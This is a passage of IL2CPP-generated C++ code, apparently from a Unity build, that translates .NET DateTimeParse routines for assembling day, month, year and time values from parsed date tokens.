(!((int32_t)((int32_t)L_1&(int32_t)((int32_t)64)))) { goto IL_001a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001a: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_4 = ___raw2; int32_t L_5 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_4, 0, /*hidden argument*/NULL); L_3->set_Hour_3(L_5); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw2; int32_t L_8 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, 1, /*hidden argument*/NULL); L_6->set_Minute_4(L_8); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_10 = ___raw2; int32_t L_11 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_10, 2, /*hidden argument*/NULL); L_9->set_Second_5(L_11); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result1; int32_t* L_13 = L_12->get_address_of_flags_8(); int32_t* L_14 = L_13; int32_t L_15 = *((int32_t*)L_14); *((int32_t*)L_14) = (int32_t)((int32_t)((int32_t)L_15|(int32_t)((int32_t)64))); return (bool)1; } } // System.Boolean System.DateTimeParse::GetDateOfDSN(System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfDSN_m391AABD326E77DA46D71FE1ACCF1C8FCABA4824C (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDateOfDSN_m391AABD326E77DA46D71FE1ACCF1C8FCABA4824C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_0 = ___raw1; int32_t L_1 = L_0->get_numCount_1(); if ((!(((uint32_t)L_1) == ((uint32_t)1)))) { goto IL_0012; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; int32_t L_3 = L_2->get_Day_2(); if ((((int32_t)L_3) == ((int32_t)(-1)))) { goto IL_0021; } } IL_0012: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_4, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0021: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_6 = ___raw1; int32_t L_7 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_6, 0, /*hidden argument*/NULL); L_5->set_Day_2(L_7); return (bool)1; } } // System.Boolean System.DateTimeParse::GetDateOfNDS(System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfNDS_m66C24ADF6167A1B0779C0436ED3CBCD602EBEBBB (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDateOfNDS_m66C24ADF6167A1B0779C0436ED3CBCD602EBEBBB_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_Month_1(); if ((!(((uint32_t)L_1) == ((uint32_t)(-1))))) { goto IL_0018; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0018: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; int32_t L_4 = L_3->get_Year_0(); if ((((int32_t)L_4) == ((int32_t)(-1)))) { goto IL_0030; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_5, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0030: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw1; int32_t L_8 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, 0, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t* L_10 = L_9->get_address_of_Year_0(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_11 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_6, L_8, (int32_t*)L_10, /*hidden argument*/NULL); if (L_11) { goto IL_0054; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_12, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0054: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; L_13->set_Day_2(1); return (bool)1; } } // System.Boolean System.DateTimeParse::GetDateOfNNDS(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfNNDS_m1390DC4CE0E6333945D7BD08F124AA0415A700B6 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDateOfNNDS_m1390DC4CE0E6333945D7BD08F124AA0415A700B6_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)1))) { goto IL_005c; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; int32_t L_3 = L_2->get_flags_8(); if (((int32_t)((int32_t)L_3&(int32_t)2))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result0; int32_t L_5 = L_4->get_flags_8(); if (((int32_t)((int32_t)L_5&(int32_t)4))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw1; int32_t L_8 = L_7->get_year_3(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t* L_10 = L_9->get_address_of_Year_0(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_11 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_6, L_8, (int32_t*)L_10, /*hidden argument*/NULL); if (!L_11) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; int32_t L_14 = L_13->get_Year_0(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_15 = ___raw1; int32_t L_16 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_15, 0, /*hidden argument*/NULL); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_17 = ___raw1; int32_t L_18 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_17, 1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_19 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_12, L_14, L_16, L_18, /*hidden argument*/NULL); if (!L_19) { goto IL_00f9; } } { return (bool)1; } IL_005c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_20 = ___result0; int32_t L_21 = L_20->get_flags_8(); if (!((int32_t)((int32_t)L_21&(int32_t)2))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_22 = ___result0; int32_t L_23 = L_22->get_flags_8(); if (((int32_t)((int32_t)L_23&(int32_t)1))) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_24 = ___result0; int32_t L_25 = L_24->get_flags_8(); if (((int32_t)((int32_t)L_25&(int32_t)4))) { goto IL_00f9; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_26 = ___dtfi2; String_t* L_27 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_26, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_28 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_29 = DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776(L_27, L_28, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_29) { goto IL_00a4; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_30 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_31 = ___dtfi2; String_t* L_32 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_31, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_30, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_32, /*hidden argument*/NULL); return (bool)0; } IL_00a4: { int32_t L_33 = V_0; if (L_33) { goto IL_00d0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_34 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_35 = ___raw1; int32_t L_36 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_35, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_37 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_34, L_36, (int32_t*)(&V_1), /*hidden argument*/NULL); if (!L_37) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_38 = ___result0; int32_t L_39 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_40 = ___result0; int32_t L_41 = L_40->get_Month_1(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_42 = ___raw1; int32_t L_43 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_42, 1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_44 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_38, L_39, L_41, L_43, /*hidden argument*/NULL); if (!L_44) { goto IL_00f9; } } { return (bool)1; } IL_00d0: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_45 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_46 = ___raw1; int32_t L_47 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_46, 1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_48 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_45, L_47, (int32_t*)(&V_1), /*hidden argument*/NULL); if (!L_48) { goto IL_00f9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_49 = ___result0; int32_t L_50 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_51 = ___result0; int32_t L_52 = L_51->get_Month_1(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_53 = ___raw1; int32_t L_54 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_53, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_55 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_49, L_50, L_52, L_54, /*hidden argument*/NULL); if (!L_55) { goto IL_00f9; } } { return (bool)1; } IL_00f9: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_56 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_56, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::ProcessDateTimeSuffix(System.DateTimeResult&,System.DateTimeRawInfo&,System.DateTimeToken&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessDateTimeSuffix_m78BC07D99DB12539C79C1238D753A0FCC1B73CF3 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * ___dtok2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_0 = ___dtok2; int32_t L_1 = L_0->get_suffix_1(); V_0 = L_1; int32_t L_2 = V_0; if ((((int32_t)L_2) > ((int32_t)((int32_t)2560)))) { goto IL_002f; } } { int32_t L_3 = V_0; if ((((int32_t)L_3) == ((int32_t)((int32_t)2048)))) { goto IL_0055; } } { int32_t L_4 = V_0; if ((((int32_t)L_4) == ((int32_t)((int32_t)2304)))) { goto IL_0086; } } { int32_t L_5 = V_0; if ((((int32_t)L_5) == ((int32_t)((int32_t)2560)))) { goto IL_00b7; } } { goto IL_014d; } IL_002f: { int32_t L_6 = V_0; if ((((int32_t)L_6) == ((int32_t)((int32_t)2816)))) { goto IL_00dc; } } { int32_t L_7 = V_0; if ((((int32_t)L_7) == ((int32_t)((int32_t)3072)))) { goto IL_0101; } } { int32_t L_8 = V_0; if ((((int32_t)L_8) == ((int32_t)((int32_t)3328)))) { goto IL_0128; } } { goto IL_014d; } IL_0055: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; int32_t L_10 = L_9->get_flags_8(); if (!((int32_t)((int32_t)L_10&(int32_t)1))) { goto IL_0061; } } { return (bool)0; } IL_0061: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result0; int32_t* L_12 = L_11->get_address_of_flags_8(); int32_t* L_13 = L_12; int32_t L_14 = *((int32_t*)L_13); *((int32_t*)L_13) = (int32_t)((int32_t)((int32_t)L_14|(int32_t)1)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_16 = ___raw1; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_17 = ___dtok2; int32_t L_18 = L_17->get_num_2(); int32_t L_19 = L_18; V_1 = L_19; L_16->set_year_3(L_19); int32_t L_20 = V_1; L_15->set_Year_0(L_20); goto IL_014d; } IL_0086: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result0; int32_t L_22 = L_21->get_flags_8(); if (!((int32_t)((int32_t)L_22&(int32_t)2))) { goto IL_0092; } } { return (bool)0; } IL_0092: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t* L_24 = L_23->get_address_of_flags_8(); int32_t* L_25 = L_24; int32_t L_26 = *((int32_t*)L_25); *((int32_t*)L_25) = (int32_t)((int32_t)((int32_t)L_26|(int32_t)2)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_27 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_28 = ___raw1; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_29 = ___dtok2; int32_t L_30 = L_29->get_num_2(); int32_t L_31 = L_30; V_1 = L_31; L_28->set_month_2(L_31); int32_t L_32 = V_1; L_27->set_Month_1(L_32); goto IL_014d; } IL_00b7: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result0; int32_t L_34 = L_33->get_flags_8(); if (!((int32_t)((int32_t)L_34&(int32_t)4))) { goto IL_00c3; } } { return (bool)0; } IL_00c3: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_35 = ___result0; int32_t* L_36 = L_35->get_address_of_flags_8(); int32_t* L_37 = L_36; int32_t L_38 = *((int32_t*)L_37); *((int32_t*)L_37) = (int32_t)((int32_t)((int32_t)L_38|(int32_t)4)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_39 = ___result0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_40 = ___dtok2; int32_t L_41 = L_40->get_num_2(); L_39->set_Day_2(L_41); goto IL_014d; } IL_00dc: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_42 = ___result0; int32_t L_43 = L_42->get_flags_8(); if (!((int32_t)((int32_t)L_43&(int32_t)8))) { goto IL_00e8; } } { return (bool)0; } IL_00e8: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_44 = ___result0; int32_t* L_45 = L_44->get_address_of_flags_8(); int32_t* L_46 = L_45; int32_t L_47 = *((int32_t*)L_46); *((int32_t*)L_46) = (int32_t)((int32_t)((int32_t)L_47|(int32_t)8)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_48 = ___result0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_49 = ___dtok2; int32_t L_50 = L_49->get_num_2(); L_48->set_Hour_3(L_50); goto IL_014d; } IL_0101: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_51 = ___result0; int32_t L_52 = L_51->get_flags_8(); if (!((int32_t)((int32_t)L_52&(int32_t)((int32_t)16)))) { goto IL_010e; } } { return (bool)0; } IL_010e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result0; int32_t* L_54 = L_53->get_address_of_flags_8(); int32_t* L_55 = L_54; int32_t L_56 = *((int32_t*)L_55); *((int32_t*)L_55) = (int32_t)((int32_t)((int32_t)L_56|(int32_t)((int32_t)16))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_57 = ___result0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_58 = ___dtok2; int32_t L_59 = L_58->get_num_2(); L_57->set_Minute_4(L_59); goto IL_014d; } IL_0128: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_60 = ___result0; int32_t L_61 = L_60->get_flags_8(); if (!((int32_t)((int32_t)L_61&(int32_t)((int32_t)32)))) { goto IL_0135; } } { return (bool)0; } IL_0135: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_62 = ___result0; int32_t* L_63 = L_62->get_address_of_flags_8(); int32_t* L_64 = L_63; int32_t L_65 = *((int32_t*)L_64); *((int32_t*)L_64) = (int32_t)((int32_t)((int32_t)L_65|(int32_t)((int32_t)32))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_66 = ___result0; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_67 = ___dtok2; int32_t L_68 = L_67->get_num_2(); L_66->set_Second_5(L_68); } IL_014d: { return (bool)1; } } // System.Boolean System.DateTimeParse::ProcessHebrewTerminalState(System.DateTimeParse/DS,System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessHebrewTerminalState_m1D9D4E8A87FFACE53E9313F6A469620E24FA573D (int32_t ___dps0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, int32_t* ___styles2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ProcessHebrewTerminalState_m1D9D4E8A87FFACE53E9313F6A469620E24FA573D_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___dps0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_0, (int32_t)((int32_t)23)))) { case 0: { goto IL_00bd; } case 1: { goto IL_00bd; } case 2: { goto IL_0046; } case 3: { goto IL_014f; } case 4: { goto IL_014f; } case 5: { goto IL_014f; } case 6: { goto IL_014f; } case 7: { goto IL_014f; } case 8: { goto IL_0088; } case 9: { goto IL_014f; } case 10: { goto IL_00f6; } case 11: { goto IL_0128; } case 12: { goto IL_0135; } case 13: { goto IL_0142; } } } { goto IL_014f; } IL_0046: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_1 = ___raw3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_2 = ___raw3; int32_t L_3 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_2, 1, /*hidden argument*/NULL); L_1->set_year_3(L_3); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw3; int32_t* L_6 = L_5->get_address_of_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw3; int32_t* L_8 = L_7->get_address_of_month_2(); bool L_9 = DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92(L_4, (int32_t*)L_6, (int32_t*)L_8, (bool)1, /*hidden argument*/NULL); if (L_9) { goto IL_0078; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_10 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_10, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0078: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_12 = ___raw3; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_14 = DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_11, (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_12, L_13, /*hidden argument*/NULL); if (L_14) { goto IL_015e; } } { return (bool)0; } IL_0088: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_15 = ___dtfi4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_16 = ___raw3; int32_t* L_17 = L_16->get_address_of_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_18 = ___raw3; int32_t* L_19 = L_18->get_address_of_month_2(); bool L_20 = DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92(L_15, (int32_t*)L_17, (int32_t*)L_19, (bool)1, /*hidden argument*/NULL); if (L_20) { goto IL_00ad; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_21, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00ad: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_22 = ___result1; 